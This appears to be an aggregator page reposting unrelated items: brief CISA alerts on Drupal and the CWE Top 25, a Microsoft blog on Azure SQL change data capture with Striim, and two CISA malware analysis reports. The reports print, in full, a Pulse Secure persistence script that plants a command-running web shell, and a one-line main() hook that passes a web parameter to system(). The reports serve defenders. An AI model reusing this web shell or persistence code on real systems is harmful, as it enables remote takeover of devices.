This article is contributed. See the original author and article here.
Drupal has released security updates to address a critical third-party-library vulnerability that could affect Drupal 7, 8.9, 9.1, and 9.2. An attacker could exploit this vulnerability to take control of an affected system.
CISA encourages users and administrators to review the Drupal security advisory and apply the necessary updates.
This article is contributed. See the original author and article here.
The Homeland Security Systems Engineering and Development Institute, sponsored by the Department of Homeland Security and operated by MITRE, has released the 2021 Common Weakness Enumeration (CWE) Top 25 Most Dangerous Software Weaknesses list. The Top 25 uses data from the National Vulnerability Database (NVD) to compile the most frequent and critical errors that can lead to serious vulnerabilities in software. An attacker can often exploit these vulnerabilities to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.
CISA encourages users and administrators to review the Top 25 list and evaluate recommended mitigations to determine those most suitable to adopt.
This article is contributed. See the original author and article here.
This blog is part of the Change Data Capture in Azure SQL Databases Blog Series, which started with the announcement on releasing CDC in Azure SQL Databases in early June 2021. You can view the release announcement here: https://aka.ms/CDCAzureSQLDB
Introducing Change Data Capture in Azure SQL Databases
Change data capture (CDC) provides historical change information for a user table by capturing both the fact that Data Manipulation Language (DML) changes (insert / update / delete) were made and the changed data. Changes are captured in real time by using a capture process that reads changes from the transaction log and places them in corresponding change tables. These change tables provide a historical view of the changes made over time to source tables. CDC functions enable the change data to be consumed easily and systematically.
CDC is now available in public preview in Azure SQL, enabling customers to track data changes on their Azure SQL Database tables in near real-time. Now in public preview, CDC in PaaS offers similar functionality to SQL Server and Azure SQL Managed Instance CDC, providing a scheduler which automatically runs change capture and cleanup processes on the change tables.
Streaming Change Data to External Targets
Data integration platforms such as Striim can integrate with your CDC-enabled Azure SQL Database to stream data changes to diverse targets in real-time.
“Real-time information is vital to the health of enterprises,” says Codin Pora, VP of Technology and Partnership at Striim. “Striim is excited to support the new change data capture (CDC) capabilities of Azure SQL Database and help companies drive their digital transformation by bringing together data, people, and processes. Striim, through its Azure SQL Database CDC pipelines, provides real-time data for analytics and intelligence workloads, operational reporting, ML/AI implementations and many other use cases, creating value as well as competitive advantage in a digital-first world. Striim builds continuous streaming data pipelines with minimal overhead on the source Azure SQL Database systems, while moving database operations (inserts, updates, and deletes) in real time with security, reliability, and transactional integrity.”
To learn more about using Striim for real-time ETL to Azure SQL Databases, go here. You can also try out setting up an ETL pipeline to your chosen Azure SQL Database by using Striim’s free trial.
Current Use Case
For this tutorial, we will use Striim to send CDC change data from an Azure SQL Database to another Azure SQL Database target in a separate region. The source database is enabled for CDC. Apart from that, each table that is tracked for data changes is enabled for CDC. To learn more about enabling and disabling CDC on databases and tables, go here.
Striim will connect to the source database and will push CDC changes from the change tables to the downstream target. This can be helpful for customer scenarios such as global data synchronization (i.e. keep databases in different regions around the world synchronized) or distributed applications (i.e. synchronize data across databases that store diverse workloads).
Steps for Sending CDC Data Changes from an Azure SQL Database with Striim
One of the benefits of Striim is that it supports in-flight transformations and processing as the data flows through its in-memory data pipelines for filtering, aggregating, enrichment, and alerting in real time. Many transformations are available out of the box as a drag-and-drop item from the Striim Flow Designer for a variety of popular operations, Striim Continuous Query (CQ) functionality allows users to write their own custom SQL code to run and act on their streaming data as it flows through the pipeline.
Blog Series for Change Data Capture in Azure SQL Databases
We are happy to continue the bi-weekly blog series for customers who’d like to learn more about enabling CDC in their Azure SQL Databases! This series explores different features/services that can be integrated with CDC to enhance change data functionality.
This article is contributed. See the original author and article here.
This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.
This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.
CISA received one file for analysis. The file is a Pulse Secure system application which has been modified by a malicious cyber actor. The file contains a Common Gateway Interface (CGI) code designed to modify several Pulse Secure system files utilizing the SED command. This analysis is derived from malicious files found on Pulse Connect Secure devices.
For a downloadable copy of IOCs, see: MAR-10336935-1.v1.WHITE.stix.
64c87520565165ac95b74d6450b3ab8379544933dd3e2f2c4dc9b03a3ec570a7 (DSUpgrade.pm)
webshell
| Name | DSUpgrade.pm |
|---|---|
| Size | 9783 bytes |
| Type | Perl5 module source, ASCII text |
| MD5 | 5009b307214abc4ba5e24fa99133b934 |
| SHA1 | afc52937829c78cb14ec087e66e39be3571e00ca |
| SHA256 | 64c87520565165ac95b74d6450b3ab8379544933dd3e2f2c4dc9b03a3ec570a7 |
| SHA512 | 97646de4d68a303fba971c6c83f6077125d4e6e2c02bbeee22881855265c8307fd66c391489aaafdf640e1316e1b63978c66ecadfb04f37bc6755a9e607b129d |
| ssdeep | 192:eIB1XcTfXss+nBqXb+TSWbgXCiwWjoBTWFI4MhiirXHLwQBN0G2BiF3Ar8yXpayc:eIB1X1phiJ/irZN0G2BiF3CjCswmPyVv |
| Entropy | 5.228827 |
No matches found.
No matches found.
No matches found.
This file is a legitimate Pulse Secure PERL application with malicious CGI code patched in. The malicious CGI code is designed to modify several Pulse Secure system files utilizing the SED command.
–Begin Patched In Commented CGI Code–
##start_total
##perlstart
system(“/bin/mount -o remount,rw /dev/root /”);
system(“/bin/tar -xzf /tmp/new-pack.tgz ./installer/outer-do-install”);
my $statushh = $? % 255;
if( $statushh != 0 )
{
system(“/bin/tar -xzf /tmp/new-pack.tgz ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi”);
system(“/bin/tar -xzf /tmp/new-pack.tgz ./root/home/perl/DSUpgrade.pm”);
system(“/bin/sed -i ‘/##start_total/,/##end_total/w K872Bu’ /home/perl/DSUpgrade.pm”);
system(“/bin/sed -i ‘/DSINSTALL_CLEAN/r K872Bu’ ./root/home/perl/DSUpgrade.pm”);
system(“/bin/sed -i ‘/##cgistart1/,/##cgiend1/w Mj1Za’ /home/perl/DSUpgrade.pm”);
system(“/bin/sed -i ‘/##cgistart2/,/##cgiend2/w 1uMfVB’ /home/perl/DSUpgrade.pm”);
system(“/bin/sed -i ‘/^use DSUtilTable/r Mj1Za’ ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi”);
system(“/bin/sed -i ‘/^sub main/r 1uMfVB’ ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi”);
system(“/bin/sed -i ‘/##cgistart1/,/##cgiend1/s/#//’ ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi”);
system(“/bin/sed -i ‘/##cgistart2/,/##cgiend2/s/#//’ ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi”);
system(“/usr/bin/gzip -d /tmp/new-pack.tgz”);
system(“/bin/tar -f /tmp/new-pack.tar -u ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi”);
system(“/bin/tar -f /tmp/new-pack.tar -u ./root/home/perl/DSUpgrade.pm”);
system(“/bin/rm -f K872Bu”);
system(“/bin/rm -f Mj1Za”);
system(“/bin/rm -f 1uMfVB”);
system(“/bin/rm -fr root”);
system(“rm -f /tmp/new-pack.tgz”);
system(“/usr/bin/gzip -c /tmp/new-pack.tar > /tmp/new-pack.tgz”);
}
else{
system(“/bin/sed -i ‘/##start_total/,/##end_total/w Nc3Gy.pm’ /home/perl/DSUpgrade.pm”);
system(“/bin/sed -i ‘/packdecrypt/r Nc3Gy.pm’ ./installer/outer-do-install”);
system(“/bin/sed -i ‘/##perlstart/,/##perlend/s/^/#/’ ./installer/outer-do-install”);
system(“/bin/sed -i ‘/##scriptstart/,/##scriptend/s/#//’ ./installer/outer-do-install”);
system(“/usr/bin/gzip -d /tmp/new-pack.tgz”);
system(“/bin/tar -f /tmp/new-pack.tar -u ./installer/outer-do-install”);
system(“rm -f Nc3Gy.pm”);
system(“rm -f /tmp/new-pack.tgz”);
system(“/usr/bin/gzip -c /tmp/new-pack.tar > /tmp/new-pack.tgz”);
system(“rm -fr installer”);
}
##perlend
###scriptstart
#/bin/mount -o remount,rw /dev/root /
#/bin/tar -xzf $innerarchive ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/tar -xzf $innerarchive ./root/home/perl/DSUpgrade.pm
#/bin/sed -i ‘/##start_total/,/##end_total/w 7CxA1p’ outer-do-install
#/bin/sed -i ‘/DSINSTALL_CLEAN/r 7CxA1p’ ./root/home/perl/DSUpgrade.pm
#/bin/sed -i ‘/##cgistart1/,/##cgiend1/w GqTv3w’ outer-do-install
#/bin/sed -i ‘/##cgistart2/,/##cgiend2/w Vi6d8h4’ outer-do-install
#/bin/sed -i ‘/^use DSUtilTable/r GqTv3w’ ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i ‘/^sub main/r Vi6d8h4’ ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i ‘/##cgistart1/,/##cgiend1/s/#//’ ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i ‘/##cgistart2/,/##cgiend2/s/#//’ ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i ‘/##perlstart/,/##perlend/s/#//’ ./root/home/perl/DSUpgrade.pm
#/bin/sed -i ‘/##scriptstart/,/##scriptend/s/^/#/’ ./root/home/perl/DSUpgrade.pm
#/usr/bin/gzip -d $innerarchive
#/bin/tar -f /tmp/inside-package.tar -u ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/tar -f /tmp/inside-package.tar -u ./root/home/perl/DSUpgrade.pm
#/bin/rm -f 7CxA1p
#/bin/rm -f GqTv3w
#/bin/rm -f Vi6d8h4
#/bin/rm -fr root
#/usr/bin/gzip -c /tmp/inside-package.tar > $innerarchive
###scriptend
###cgistart1
#use lib ($ENV{‘DSINSTALL’} =~ /(S*)/)[0] . “/perl/lib”;
#use lib ($ENV{‘DSINSTALL’} =~ /(S*)/)[0] . “/perl/lib/MIME/Base64”;
#use Crypt::RC4;
#use MIME::Base64 ();
#
#sub parse_parameters ($) {
# my %ret;
#
# my $input = shift;
#
# foreach my $pair (split(‘&’, $input)) {
# my ($var, $value) = split(‘=’, $pair, 2);
#
# if($var) {
# $value =~ s/+/ /g ;
# $value =~ s/%(..)/pack(‘c’,hex($1))/eg;
#
# $ret{$var} = $value;
# }
# }
#
# return %ret;
#}
###cgiend1
###cgistart2
# my $enckey=’1234567′;
# my $data=’1234567812345678′;
# my $cipher = RC4($enckey, $data);
# my $encode = MIME::Base64::encode($cipher);
# my $psalLaunch = CGI::param(“CPrimerPlus”);
# if ($psalLaunch =~ /<REDACTED>/)
# {
# my ($cmd, %FORM);
#
# $|=1;
#
# print “Content-Type: text/htmlrn”;
# print “rn”;
# %FORM = parse_parameters($ENV{‘QUERY_STRING’});
#
# if(defined $FORM{‘cmd’}) {
# $cmd = $FORM{‘cmd’};
# }
#
#print ‘<HTML>
#<body>
#<form action=”” method=”GET”>
#<input type=”text” name=”cmd” size=45 value=”‘ . $cmd . ‘”>
#<input type=”text” name=”CPrimerPlus” size=45 value=”<REDACTED>”>
#<input type=”submit” value=”Run”>
#</form>
#<pre>’;
#
#if(defined $FORM{‘cmd’}) {
# print “Results of ‘$cmd’ execution:nn”;
# print “-“x80;
# print “n”;
#
# print $encode;
# system $cmd;
# print “-“x80;
# print “n”;
#}
# print “</pre>”;
# exit(0);
# }
###cgiend2
–End Patched In Commented CGI Code–
CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.
Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.
CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/
What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.
What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.
Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.
Can I submit malware to CISA? Malware samples can be submitted via three methods:
CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.
This article is contributed. See the original author and article here.
This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.
This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.
CISA received one file for analysis. This file is a Pulse Secure system application that has been modified. The modification effectively allows a remote operator to have command and control (C2) capabilities over a compromised Pulse Secure device. This analysis is derived from malicious files found on Pulse Connect Secure devices.
For a downloadable copy of IOCs, see: MAR-10336161-1.v1.WHITE.stix.
c964594ed0afaf64611514eb53f14ee5ab95e25da986dca9e28586bfc053da16 (tnchcupdate.cgi)
backdoorremote-access-trojantrojanwebshell
| Name | tnchcupdate.cgi |
|---|---|
| Size | 27958 bytes |
| Type | Perl script text executable |
| MD5 | a3b98da94d6d65745df01314a5a5d0f5 |
| SHA1 | 168a7b58875f8c4dfeb9ea311db7ce7275295c74 |
| SHA256 | c964594ed0afaf64611514eb53f14ee5ab95e25da986dca9e28586bfc053da16 |
| SHA512 | 76831761fcd068589ff4ec89b00371548b430edce57ede913ef0e11f9a962c8addc15a751c3865a6c44cabbf8068f45c089600ca7b2ebbac2e4ab129bf3b0bad |
| ssdeep | 384:F/XaWMIVzjJVreteR03LD/AxrYjVRzptulRvU71F2K9gjOTU:F/Xa94jJVrete2gxrYj34vU7/2K2CU |
| Entropy | 4.919656 |
No matches found.
No matches found.
No matches found.
This file is a Pulse Secure Common Gateway Interface (CGI) script with a modification that allows a remote operator to execute commands on the compromised Pulse Secure device. The following modification will hook the main() function to the malicious CGI script:
–Begin Malicious Main() Hook Code–
if(CGI::param(“id”)){print “Cache-Control: no-cachen”;print “Content-type: text/htmlnn”;my $na=CGI::param(“id”);system(“$na”);}else{&main();}
–End Malicious Main() Hook Code–
This hook checks for an incoming parameter to the web application named “id”. If such a parameter is passed to the application, its corresponding data is extracted and executed on the target system using the system() function. If no “id” parameter is provided to the application this code simply executes its original main() function.
CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.
Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.
CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/
What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.
What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.
Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.
Can I submit malware to CISA? Malware samples can be submitted via three methods:
CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.
Recent Comments